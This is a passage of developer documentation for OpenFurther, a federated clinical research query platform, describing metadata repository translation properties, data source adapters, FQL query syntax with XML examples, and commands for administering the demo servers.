This is the job of the query result set translations: to translate all the query results back to a common\/canonical\/platform-independent model, or the OpenFurther model in this case.\nOpenFurther uses XQuery code to translate platform-specific result sets to the OpenFurther model, implying all data is\/must be converted to XML. Converting to XML is not an extra cost since OpenFurther is a web service-centric infrastructure where messages between services are communicated via XML. Query results are no exception. Data within the MDR drives the XQuery code to translate the data source-specific data model and values to the OpenFurther data model and values based on standard terminology. After the XML has been translated, the data are unmarshaled back to Java objects, the OpenFurther model Java objects, where\/when they are persisted to the query results database (typically the in-memory database) using Hibernate.\n\n.Result Translation\nimage::images\/figures\/result_translation.png[]\n\nCreating metadata in the MDR\n++++++++++++++++++++++++++++\nTranslations depend on the MDR for attribute-to-attribute translations. The MDR is supported by an abstract data model where metadata \"things\" are Assets (see the FMDR.ASSET table), including data classes and class attributes. There are other Asset supporting tables ASSET_VERSION and ASSET_RESOURCE that you can ignore for now, as they are not currently used for this purpose. There are, however, two other tables that are critical, ASSET_ASSOC (association) and ASSET_ASSOC_PROP (association properties). ASSET, ASSET_ASSOC, and ASSET_ASSOC_PROP work together to describe attribute-to-attribute translation mappings. Assets also represent association types, such as hasAttribute, or translatesTo. The MDR contains metadata used for both Query Translations and Result Translations.\n[NOTE]\nThe MDR is configured using Java class and Java field names, rather than database table and attribute names.\n\nThere are 3 phases to configure a new data source for the MDR.\n\n.Phase 1\nThe first thing that should happen is to create a Mapping of the FURTHER model to your local data model. This step is generally performed by a Terminologist and\/or Data Architect and has no specific configuration with the MDR, but serves as the business requirements or data dictionary document for configuring the MDR in Phases 2 and 3.\n\nYou can use this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Mappings_Demo.xls\n\n.Phase 2\nConfigure your local data source for the MDR.\n\nYou should review and have a fair understanding of the following MDR data model before proceeding.\n\n.MDR ERD Diagram\nimage::images\/figures\/fmdr.png[MDR ERD Diagram]\n\n\/\/ Here is just One way of having a blank line with AsciiDoc\n{empty} +\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Asset_Demo.xls\n\nThe Excel File's Instructions Tab contains the following high-level steps:\n\n1. Create a namespace - a namespace is itself an Asset of Asset type namespace (see other namespace Assets for examples). \nRetrieve the newly created Asset ID for MyNamespace and use this Asset ID to create your classes and attributes in Steps 2 & 3.\n2. 
Create a class in MyNamespace - this is done by creating another Asset that is of type Physical Class.\nRetrieve the newly created Asset ID for MyClass and use this Asset ID to create your Class-To-Attributes Associations in Step 4.\n3. Create the class attributes in MyNamespace - this is done by creating Assets that are of type Class Attribute.\n4. Associate all of the class attributes with your class by creating an Asset Association (ASSET_ASSOC) to create the associations myPhysicalClass hasAttribute myClassAttribute for each of the attributes created in Step 3.\n\n.Phase 3\nConfigure FURTHER to External Data Source Associations and Properties\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Assoc_Demo.xls\n\nThe Excel File's Instructions Tab contains these following high level steps:\n\n1. Configure FURTHER Attribute (Java Field) to External Attribute (Java Field) Associations.\nFor example, OpenFurther.Person.dateOfBirth to MyNamespace.myPatient.birthDate. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person.dateOfBirth (left side) maps to myPerson.birthDate (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n2. Configure FURTHER Table (Java Class) to External Table (Java Class) Associations.\nFor example, OpenFurther.Person to MyNamespace.myPatient. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person (left side) maps to MyNamespace.myPatient (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n3. Create translatesTo association translation properties for the above 2 steps.\nTranslation associations (and other associations) can have properties (in ASSET_ASSOC_PROP table) that describe the translation mapping requirements. For example, some properties may direct a data type conversion such as int to string, while others may declare a function that needs to be used for a functional conversion, or even an instruction to not change an attribute name. Properties are created via the ASSET_ASSOC_PROP table and are associated to ASSET_ASSOC records.\n\n[NOTE]\nThere are two parts to the list of Potential Association Properties. \nPart One is primarily used for Query Translations, and part Two is used for Result Translations. 
\nQuery Translations are much more complex and therefore support more association properties than Result Translations.\n\n[NOTE]\nGeneral Error Handling Note:\nIf you query an Attribute (Data Element) that exists in the Central Data Model, but is missing and does not have an associated Attribute in the External Data Model, the XQuery Query Translation program is expected to Error out with the missing data element specified.\nThe reasoning is that when a data element is missing from a criteria, the definition of the entire query is changed, which therefore invalidates the entire Query.\nThis Error will halt the entire Query Processing Session.\nHowever, for Result Translation, missing data elements are not critical since the rest of the data values are still valid and may be valuable to the researchers.\nTherefore, a missing data element association in Result Translations will not halt the entire Result Translation process.\n\n.Part One (Query Translations)\nThere are Normal Scenarios and Special Scenarios for Query Translations.\n\n.Normal Scenario 1) Configure for DTS Coded Value Translation with:\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = translateCode\n\n.Normal Scenario 2) Configure for Data Type Translation with:\nProp_Name = ATTR_VALUE_TRANS_TO_DATA_TYPE\n\nProp_Val = xs:decimal (or other appropriate valid XML Data Types)\n\n.Java Data Type to XML Data Type Mapping. There may be others not listed here.\n[options=\"header\"]\n|=======================\n|Java Data Type | XML Data Type\n|char or java.lang.Character | xs:string\n|byte or java.lang.Byte | xs:byte\n|short or java.lang.Short | xs:short\n|int or java.lang.Integer | xs:int\n|long or java.lang.Long | xs:long\n|float or java.lang.Float | xs:float\n|double or java.lang.Double | xs:double\n|boolean or java.lang.Boolean | xs:boolean\n|java.lang.String | xs:string\n|java.math.BigInteger | xs:integer\n|java.math.BigDecimal | xs:decimal\n|java.util.Calendar | xs:dateTime\n|java.util.Date | xs:dateTime\n|javax.xml.namespace.QName | xs:QName\n|java.net.URI | xs:string or xs:anyURI\n|javax.xml.datatype.XMLGregorianCalendar | xs:anySimpleType\n|javax.xml.datatype.Duration | xs:duration\n|java.lang.Object | xs:anyType\n|java.awt.Image | xs:base64Binary\n|javax.activation.DataHandler | xs:base64Binary\n|javax.xml.transform.Source | xs:base64Binary\n|java.util.UUID | xs:string\n|=======================\n\n.Normal Scenario 3) Configure property for the Composite ID Association.\nThis is currently needed to support queries within previous Query Result Sets.\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = Java Data Type of the external person ID that is associated with the OpenFurther.Person.compositeId\n\nFor example,\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = java.lang.Integer\n\n.Normal Scenario 4) Configure 2 properties, Alias_Key and Alias_Value for each Table Association.\nIf there is more than one table association, configure multiple pairs of these properties.\n\nThe Prop_Val for ALIAS_KEY can be anything. 
\n\nFor example,\n\nProp_Name = ALIAS_KEY\n\nProp_Val = dx\n\nIf your data source requires a Static Alias Key Prop_Val, append 'STATIC^' to your Alias Key Prop_Val.\n\nUse this example:\n\nProp_Name = ALIAS_KEY\n\nProp_Val = STATIC^Diagnosis\n\nNow, configure the ALIAS_VALUE Property.\n\nThe Prop_Val for ALIAS_VALUE is the Java member name within the rootObject (Person Class).\n\nFor example,\n\nProp_Name = ALIAS_VALUE\n\nProp_Val = conditionEras\n\n.Special Scenario 1) Occasionally, there may be some value translations that are non-coded values. For example, if you associate age to birthYear, you will need a special custom XQuery function to perform the translation. In this case, create a function in the XQuery program called ageToBirthYear and configure the MDR with this property.\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = ageToBirthYear\n\nSo instead of the normal translateCode in the Prop_Val, we have \"ageToBirthYear\".\n\n.Special Scenario 2) Each Asset Association by default specifies that Left Asset translates to Right Asset. However, if you want to skip this translation without throwing an Error, provide an association property with the following. This is mostly used with devNull associations. For example, the FURTHER.PERSON.ID.DATASETID does not translate to anything at the External Data Sources, however, we do not want to consider this as an Error, therefore, we simply skip it from translation processing. This property is used for only Special attributes such as datasetID, and Qualifier \"Type\" attributes. This skipping property should NOT be applied to normal attributes, where an Error is expected. If you have an ObservationType that does not associate to anything in the External Source, be sure to configure an Association to devNull, and then create this property to skip the ObservationType Attribute.\n\nProp_Name = ATTR_TRANS_FUNC\n\nProp_Val = skipAttr\n\n.Special Scenario 3) The FURTHER table attribute Observation.observation is overloaded as Diagnosis, Procedure, and Lab Order. If the FURTHER.Observation table translates to more than one table at the External Data Source, we must provide this property to assist with Query Translation. This property specifies the type of observation (Diagnosis, Procedure, or Lab) in the FURTHER model so we know what kind of data the row is representing. The Prop_Val is the SNOMED code representing the observation type. If the FURTHER.Observation table translates to ONLY one table at the external data source, we do not need to configure this, but do ensure that the ALIAS_KEY and ALIAS_VALUE properties are configured properly as stated above in Normal Scenario 4. Always start the Prop_Name with \u201cOBSERVATION_TYPE\u201d.\n\nNote: OBSERVATION_TYPE_DX means Diagnosis.\n\nProp_Name = OBSERVATION_TYPE_DX\n\nProp_Val = 439401001\n\nOr\n\nProp_Name = OBSERVATION_TYPE_LAB\n\nProp_Val = 364712009\n\nOr\n\nProp_Name = OBSERVATION_TYPE_PROCEDURE\n\nProp_Val = 71388002\n\n\n.Special Scenario 3 Addendum) To distinguish between coding standards with the Same Observation Type.\nWhen you have multiple attributes that translate to multiple coding standards in the external data source, you will need to configure the Prop_Name with a unique name and append the DTS Namespace ID to the Prop_Val. 
Replace the ^DTS_Namespace_ID with whatever you are actually using in your DTS environment.\n\nFor Diagnosis, using ICD9\n\nProp_Name = OBSERVATION_TYPE_DX_ICD9\n\nProp_Val = 439401001^10\n\nFor Diagnosis, using ICD10\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10\n\nProp_Val = 439401001^1518\n\nIf you would like to force a specific observationType and namespace combination to Error Out,\nyou append '^E' at the end of the Prop_Name like this:\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10^E\n\nProp_Val = 439401001^1518\n\n\n.Special Scenario 4) Sometimes one FURTHER <criteria> node translates to two <criteria> nodes at the External Data Source. For example, FURTHER.Person.race translates to OpenMRS.PersonAttribute.value, where the PersonAttributeType = 1. Therefore, we need one <criteria> for the OpenMRS.PersonAttribute.value and another <criteria> node for OpenMRS.PersonAttribute.PersonAttributeType. What we will do is create an XML Template in the MDR where we will replace a specific <criteria> with the translated criteria. Refer to the example below. \n\nTo configure an XML Template, use this Property:\n\nProp_Name = MORE_CRITERIA\n\nProp_Val = {XML Template} (In One Continuous String is better for output format)\n\nWhere Prop_Val =\n\/\/ Not sure why I cannot use \n\/\/ [source,xml] to display source code here...\n\n<criteria xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" \n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t<searchType>IN<\/searchType>\n\t<parameters>\n\t\t<parameter xsi:type=\"xs:string\">personId<\/parameter>\n\t<\/parameters>\n\t<query rootObject=\"Person\" xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n\t\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t\t<rootCriterion>\n\t\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t\t<criteria moreCriteria=\"ReplaceMe\"><\/criteria>\n\t\t\t<criteria>\n\t\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t\t<parameters>\n\t\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:string\">pa.personAttributeType<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:long\">1<\/parameter>\n\t\t\t\t<\/parameters>\n\t\t\t<\/criteria>\n\t\t<\/rootCriterion>\n\t\t<aliases>\n\t\t\t<alias associationObject=\"PersonAttribute\">\n\t\t\t\t<key>pa<\/key>\n\t\t\t\t<value>personAttributes<\/value>\n\t\t\t<\/alias>\n\t\t<\/aliases>\n\t<\/query>\n<\/criteria>\n\n.Special Scenario 5) Sometimes a FURTHER Person Field translates to a non-person table at the external source. Since we do not get <alias> nodes for FURTHER Person Fields, we need to create new alias(es) for these scenarios. For example, FURTHER.Person.vitalStatus translates to the OpenMRS.ObservationPeriod.personStatusConceptId field. In this case, use this property configuration:\n\nProp_Name = ATTR_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\nWhere Prop_Val = \u201cop^observationPeriods\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above. \n\n.Special Scenario 6) Add Extra Alias for Special Cases\nSometimes we have an alias that translates to multiple aliases due to hierarchy relationship levels. This EXCLUDES Observation Types Issues. 
For example, FURTHER.orders table translates to OpenMRS.patient.orders table. Therefore, we need another alias to support the Sub Level. We need the Translated aliases to be like this, where the ord will go through the patient object:\n\n<aliases>\n <alias associationObject=\"Observations\">\n <key>p<\/key>\n <value>patient<\/value>\n <\/alias>\n <alias associationObject=\"Order\">\n <key>ord<\/key>\n <value>p.orders<\/value>\n <\/alias>\n<\/aliases>\n\nNote that for this situation, we DO NOT want to update any parameter alias values in the XML Query file.\n\nProp_Name = EXTRA_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\ni.e. Prop_Val = \u201cobs^observations\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above.\n\n.Special Scenario 7) To activate Dynamic Custom Function Calls, we can configure a function name, prefixed with 'CUSTOM^fqt:'.\nYou must have a XQuery function with a matching name for this to work. \nNote that the function name must be prefixed with the 'fqt:' XQuery Namespace.\n\nFor example, if you want to apply a Custom XQuery function yearFromDateTime to the value to be translated:\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = CUSTOM^fqt:yearFromDateTime\n\n\n\n\n\n.Part Two (Result Translations)\nThere are Normal Scenarios and Special Scenarios for Result Translations.\n\n.Normal Scenario 1) Specify the RESULT_PATH for each External Asset. You can include the XPath Predicate when necessary. The XPath Value begins under the rootObject of the External data model. For example, if the rootObject is Person, and you are trying to get to the gender, use \u2018\/gender\u2019 as the XPath value. The rootObject \u2018\/Person\u2019 part is not needed.\n\nProp_Name = RESULT_PATH\n\nProp_Val = {XPath Value to the External XML Node}\n\nFor example, Prop_Val =\n\/personAttributes\/personAttribute\/value[..\/personAttributeType=1]\n\n.Normal Scenario 2) Specify the External Root Object\u2019s ID Attribute.\n\nGenerally, this property is set for the {FURTHER.PERSON} to {EXTERNAL.PERSON} association.\n\nNote that we may want to rename this property name to EXT_PERSON_ID_ATTR in the future, since we may want to support multiple root objects in the future.\n\nProp_Name = EXT_ROOT_ID_ATTR\n\nProp_Val = {rootObject ID Attribute}\n\nFor example, Prop_Val = personId\n\nBe sure to have a One-To-One Mapping for the rootObject. 
If a One-To-Many mapping is really necessary, specify an additional property with:\n\nProp_Name = RESULT_SELECTION\n\nProp_Val = pickMe\n\nOr you can disable the unnecessary association by setting the asset_assoc.enabled field to \u2018N\u2019.\n\n.Special Scenario 3) To skip an attribute from Result Translation, set the RESULT_PATH property value to \u201cS\u201d (Skip).\nA Result Attribute will automatically be skipped if it has no value, or if the result tag does not exist.\n\nProp_Name = RESULT_PATH\n\nProp_Val = S\n\n.Part Three (Query & Result Translations)\nBy default, when calling DTS (Apelon Terminology Server), we get the exact match of the external 'Local Code' value.\nHowever, we can override this default with an association property like this:\n\nIf we want to get the value of DTS property type 'Value_Of_Race'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Value_Of_Race\n\nOR\n\nIf we want to get the value of DTS property type 'Domain'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Domain\n\nThis will create a DTS call like this:\n\nhttp:\/\/dev-esb.further.utah.edu:9000\/dts\/rest\/translate\/30\/Code%20in%20Source\/439401001\/32776\/Domain?view=HUMAN\n\n\n\nData Source Adapters\n--------------------\nData source adapters are the pieces of OpenFurther which interact with a data source. Loosely speaking, data source adapters are like plugins. They are simply modules that listen for incoming query requests and act upon them, following a specified protocol. Any programming language that can send and receive messages to and from a JMS topic, as well as process XML, can be used to program a data source adapter. We do, however, recommend using the existing framework.\n\nData source adapters follow a standard protocol:\n\n* initialization\n* query translation\n* execution\n* result translation\n\nAt the end of each step, status messages are sent to a JMS topic. Statuses include the current state of the query and how many results have been processed at that time.\n\nLikewise, every query can be in one of the following states:\n\n* QUEUED\n* STARTED\n* EXECUTING\n* STOPPED\n* FAILED\n\nJava Data Source Adapter Framework\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther provides several data source adapters, supported by the community, that run against well-known data models. These adapters can be used by downloading the existing adapter, customizing the configuration, compiling them for execution, and installing them into the system.\n\nAdditionally, OpenFurther is flexible and also provides the ability to implement your own custom adapter. Reasons for doing this include but are not limited to:\n\n* A custom data model\n* A custom interface for accessing the data, such as a web service.\n* Custom processing required beyond the standard processing steps within an adapter.\n\nImplementing a custom data source adapter\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nWe recommend downloading the source code of an existing data source adapter to use as a reference and starting point for your custom data source adapter. Existing data source adapters can be found here https:\/\/github.com\/openfurther\/further-open-datasources\n\nQuery Processors\n^^^^^^^^^^^^^^^^\nData source adapters follow a chain-of-responsibility pattern. The query is passed through several processors and each processor is given an opportunity to act on or ignore the data given to it by the processing of previous processors. 
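\n\nA minimal sketch of this pattern, in Java, is shown below. The interface and context class are illustrative only (they are not the actual OpenFurther processor API); they simply show how each processor acts on the output of its predecessors and then hands off to the rest of the chain:\n\n[source,java,numbered]\n----\nimport java.util.List;\n\n\/\/ Illustrative chain-of-responsibility sketch; not the real OpenFurther interfaces.\ninterface QueryProcessor\n{\n    \/\/ Act on (or ignore) the context, then pass control down the chain.\n    void process(QueryContext context, List<QueryProcessor> remaining);\n}\n\n\/\/ Carries the intermediate output from one processor to the next.\nclass QueryContext\n{\n    private Object payload;\n\n    Object getPayload() { return payload; }\n    void setPayload(final Object payload) { this.payload = payload; }\n}\n\nclass LoggingQp implements QueryProcessor\n{\n    @Override\n    public void process(final QueryContext context, final List<QueryProcessor> remaining)\n    {\n        \/\/ Inspect or transform the data produced by earlier processors.\n        System.out.println(\"Payload so far: \" + context.getPayload());\n\n        \/\/ Hand off to the next processor in the chain, if any.\n        if (!remaining.isEmpty())\n        {\n            remaining.get(0).process(context, remaining.subList(1, remaining.size()));\n        }\n    }\n}\n----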
\n\nThere are several default query processors for each step within data source adaptation.\n\nEach Query Processor has a Delegate implementation that contains the business logic to implement each processor.\n\n* QueryTranslatorQp\n** Delegate: QueryTranslatorXQueryImpl - implements query translation by utilizing an XQuery program which in turn utilizes metadata within the MDR. XQuery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* QueryExecutorQp\n** Delegate: ExecutorQuestImpl \u2013 implements query execution based on the data source type specified by DS_TYPE within initialization. Currently, only database data sources are well supported, however, web service data sources can be implemented with additional effort.\n* ResultTranslatorQp\n** Delegate: ResultTranslatorXqueryImpl \u2013 implements result translation by applying an XQuery file to the marshaled XML results. XQuery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* FinalizerQp\n** Delegate: FinalizerMock \u2013 does nothing but finish the query\n\nFederated Query Engine (FQE)\n----------------------------\n\nFederated Query Language (FQL)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nAll queries sent to OpenFurther are constructed using FQL. FQL is an object-oriented query language expressed in XML that is largely based on the http:\/\/docs.jboss.org\/hibernate\/orm\/3.3\/reference\/en\/html\/querycriteria.html[Hibernate Criteria API]. \n\nRoot Object\n^^^^^^^^^^^\nFQL queries are constructed against a given data model, for instance, the OpenFurther model. Every query is centered around a given object. This is called the root object. For instance, when querying for persons with a particular diagnosis, the root object would be Person.\n\nYou declare the root object as an attribute of the <query> tag:\n\n.Declaring a root object\n[source,xml,numbered]\n----\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" \n\trootObject=\"Person\">\n\t....\n<\/query>\n----\n\nQuery Attributes\n^^^^^^^^^^^^^^^^\nFQL query attributes are simply the field names (instance variables) of the root object you're querying against. 
If you're familiar with SQL, you can think of query attributes like database columns.\n\nFor instance, in the following Person class, you could use 'compositeId', 'administrativeGenderNamespaceId', and 'administrativeGender' are all query attributes that can be used in FQL.\n\n.Java root object fields\n[source,java,numbered]\n----\npublic class Person implements PersistentEntity<PersonId>\n{\n\n\t@Column(name = \"FPERSON_COMPOSITE_ID\")\n\tprivate String compositeId;\n\n\t@Column(name = \"administrative_gender_nmspc_id\")\n\tprivate Long administrativeGenderNamespaceId;\n\n\t@Column(name = \"administrative_gender_cid\")\n\tprivate String administrativeGender;\n\n\t....\n\n}\n----\n\nFQL Reference\n^^^^^^^^^^^^^\n\nSimple Expressions\n++++++++++++++++++\n\n.EQ - Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>EQ<\/parameter>\n <parameter>DiagnosisGrouping.codeSequenceNumber<\/parameter>\n <parameter>766.2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.NE - Not Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>NE<\/parameter>\n <parameter>Lab.value<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GT - Greater Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LT - Less Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LE - Less Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GE - Greater Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nUnary Expressions\n+++++++++++++++++\n\n.NOT - Negation\n[source,xml,numbered]\n----\n<criteria>\n <searchType>NOT<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/critera>\n<\/criteria>\n----\n\nMultinary Expressions\n+++++++++++++++++++++\n\n.Conjunction - a conjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>CONJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\n.Disjunction - a disjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>DISJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\nInterval Expressions\n++++++++++++++++++++\n\n.Between\n[source,xml,numbered]\n----\n<criteria>\n <searchType>BETWEEN<\/searchType>\n <parameters>\n <parameter>Observation.observationValue<\/parameter>\n <parameter>1<\/parameter>\n <parameter>2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nString Expressions\n++++++++++++++++++\n\n.Like - Contains the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n 
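<!-- matchType CONTAINS below means the attribute value contains the given string -->\n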
<parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>CONTAINS<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Exact match of the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>EXACT<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value starts with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>STARTS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value ends with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>ENDS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\nCollection Expressions\n++++++++++++++++++++++\n\n.In - Value(s) is within set\n[source,xml,numbered]\n----\n<criteria>\n <searchType>IN<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">401.1<\/parameter>\n <parameter xsi:type=\"xs:string\">401.2<\/parameter>\n <parameter xsi:type=\"xs:string\">401.3<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nFQL to Hibernate Criteria\n^^^^^^^^^^^^^^^^^^^^^^^^^\nSince FQL is largely based on Hibernate Criteria objects, it's possible to convert an FQL query into Hibernate Criteria that will then allow Hibernate to convert that into SQL.\n\nConverting an FQL is very simple.\n\n1. Using JAXB, unmarshal the XML into a SearchQueryTo.\n2. Locate the root hibernate entity class (typically Person or Patient) <Root Entity>\n3. Call the QueryBuilder class like below\n\n.Converting FQL to Hibernate Criteria\n[source,java,numbered]\n----\nfinal GenericCriteria hibernateCriteria = \n\tQueryBuilderHibernateImpl.convert(CriteriaType.CRITERIA, <Root \n\t\tEntity>.class, sessionFactory, searchQuery);\n----\n\nFQL Schema\n^^^^^^^^^^\n.FQL Schema\nimage::images\/figures\/search_query_xsd.png[]\n\nTechnologies\n------------\nOpenFurther is built on a number of Open Source technologies\n\n* Languages\n** Java\n** Groovy \n** Bash\n** Python\n* Development Tools\n** Maven 3\n** SonaType Nexus\n** Eclipse\n** Git\n** JIRA\n** Bamboo\n* Service Frameworks\n** Spring\n** Apache Commons\n** Apache CXF\n** Apache Camel\n* Application Servers\n** Apache ServiceMix\n* Testing\n** JUnit\n** Spock\n\nInstalling\n----------\nOpenFurther is provided as a VM image for download at this time. The VM can be used as a reference for installation, typically splitting out each Linux user as an individual server.\n\nTODO: Expand this section with detailed instructions for installing on Linux and Windows\n\nDemo System Administration\n---------------------------\nOpenFurther utilizes a number of different servers to run. The following instructions pertain to the demo VM of OpenFurther that is available for download. 
All scripts used for starting and stopping services are available within the further-open-extras repository on GitHub.\n\nTIP: The demo version contains all of the servers as individual Linux users.\n\nApache HTTP Server\n~~~~~~~~~~~~~~~~~~\nThe Apache HTTP server runs on port 80 and port 443. As root, run the following\n\n----\nservice httpd start|stop\n----\n\nIn-Memory Database Server\n~~~~~~~~~~~~~~~~~~~~~~~~~\nThe HSQLDB server runs on port 9001. As root, run the following\n\n----\n\/etc\/init.d\/hsqldb start|stop\n----\n\nCore Database Server\n~~~~~~~~~~~~~~~~~~~~\nNOTE: While our architecture supports different database, we've currently only tested OpenFurther on Oracle and Oracle XE\n\n----\nservice oracle-xe start|stop\n----\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nThe terminology server (Apelon DTS) runs on port 16666 (Requires that the Oracle Database Server has started). As root, run the following\n\n----\nsu - dtsdemo\ndts-auto start|stop\n----\n\nEnterprise Service Bus (ESB)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes an ESB (Apache ServiceMix) to run application code. The ESB requires that the in-memory database, core database, and terminology server are already started. As root, run the following\n\n----\nsu - esb\nstart_esb\n----\n\nTo stop the ESB:\n\n----\nsu - esb\nesbl\nfurther@localhost\u2019s password:\nfurther@local> shutdown\nConfirm: shutdown instance local (yes\/no):\n----\n\nLogging Locations\n~~~~~~~~~~~~~~~~~\n\nApache HTTP Server\n^^^^^^^^^^^^^^^^^^\nThe Apache HTTP server logs are located in \/var\/www\/httpd\/\n\nIn-Memory Database Server\n^^^^^^^^^^^^^^^^^^^^^^^^^\nThe HSQLDB is currently not configured for logging\n\nCore Database Server\n^^^^^^^^^^^^^^^^^^^^\nThe Oracle XE database server is currently not configured for logging\n\nTerminology Server\n^^^^^^^^^^^^^^^^^^\nThe Apelon DTS server logs in 